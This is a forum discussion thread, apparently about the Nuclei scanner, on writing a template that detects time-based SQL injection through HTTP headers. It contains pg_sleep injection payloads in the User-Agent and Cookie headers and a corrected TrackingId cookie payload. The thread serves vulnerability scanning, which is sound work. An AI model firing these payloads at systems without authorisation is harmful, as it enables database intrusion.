Test nuclei http headers #8027
-
hello community I was wondering could it be that the nuclei templates are testing the http Cookie headers from a SQL injection vulnerability Example: I tried it and it didn't work.. requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
User-Agent: "' x'||pg_sleep(20)--'"
Content-Length: "' x'||pg_sleep(15)--'"
Cookie: "'x'||pg_sleep(10)--'"
matchers:
- type: dsl
dsl:
- 'duration>=10'
- 'duration>=15'
- 'duration>=20' |
Beta Was this translation helpful? Give feedback.
Replies: 1 comment
-
Hello @0xc4sper0, We advise against relying solely on the duration DSL, as it can vary due to network issues. Therefore, we recommend adding additional matchers for better detection while running on a large dataset of hosts. In the above example, it is mentioned that the TrackingId cookie is vulnerable to SQLi. To test this vulnerability, you need to inject the cookie value instead of modifying the cookie header directly. For example: |
Beta Was this translation helpful? Give feedback.
Hello @0xc4sper0, We advise against relying solely on the duration DSL, as it can vary due to network issues. Therefore, we recommend adding additional matchers for better detection while running on a large dataset of hosts. In the above example, it is mentioned that the TrackingId cookie is vulnerable to SQLi. To test this vulnerability, you need to inject the cookie value instead of modifying the cookie header directly. For example:
TrackingId=x'||pg_sleep(10)--